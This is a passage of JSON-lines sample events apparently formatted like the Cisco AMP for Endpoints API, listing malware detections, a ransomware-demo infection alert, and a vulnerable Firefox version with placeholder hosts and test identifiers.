Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":14000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671380737589309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671380737589000,"timestamp":1610706458,"timestamp_nanoseconds":605000000,"date":"2021-01-15T10:27:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671380737589308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671123039551000,"timestamp":1610706398,"timestamp_nanoseconds":81000000,"date":"2021-01-15T10:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671123039551547","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671123039551000,"timestamp":1610706398,"timestamp_nanoseconds":60000000,"date":"2021-01-15T10:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671123039551546","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671118744584000,"timestamp":1610706397,"timestamp_nanoseconds":666000000,"date":"2021-01-15T10:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671118744584249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670861046546000,"timestamp":1610706337,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:25:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670861046546488","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670861046546000,"timestamp":1610706337,"timestamp_nanoseconds":274000000,"date":"2021-01-15T10:25:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670861046546487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670856751579000,"timestamp":1610706336,"timestamp_nanoseconds":880000000,"date":"2021-01-15T10:25:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670856751579190","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":533000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15212386047828,"timestamp":1610706149,"timestamp_nanoseconds":0,"date":"2021-01-15T10:22:29+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.B1380FD95B-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706149,"start_date":"2021-01-15T10:22:29+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"file:///C%3A/ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967"},"parent":{"disposition":"Clean","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":973000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":576000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":333000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":170000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605485","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669667045638000,"timestamp":1610706059,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:20:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669667045638188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15210587194928,"timestamp":1610706000,"timestamp_nanoseconds":0,"date":"2021-01-15T10:20:00+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610706000,"start_date":"2021-01-15T10:20:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}},"vulnerabilities":[{"name":"Mozilla Firefox","version":"41.0","cve":"CVE-2015-7204","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204"}]}} 